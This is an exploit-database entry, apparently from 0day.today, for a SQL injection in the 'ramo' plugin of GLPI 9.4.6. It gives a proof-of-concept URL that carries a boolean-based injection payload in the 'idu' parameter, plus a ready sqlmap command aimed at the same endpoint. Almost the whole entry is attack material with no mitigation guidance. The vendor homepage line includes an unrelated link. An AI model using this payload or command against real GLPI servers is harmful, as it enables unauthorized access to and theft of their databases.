id: 37481
date: 03/14/2022
title: Baixar GLPI Project 9.4.6 - SQL injection Vulnerability
author: Joas Antonio
cves: 

# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
# Exploit Author: Joas Antonio
# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
# Software Link: https://glpi-project.org/pt-br/baixar/
# Version: GLPI - 9.4.6
# Tested on: Windows/Linux
# CVE : CVE-2021-44617

#POC1:
plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111

sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"

#  0day.today [2023-03-25]  #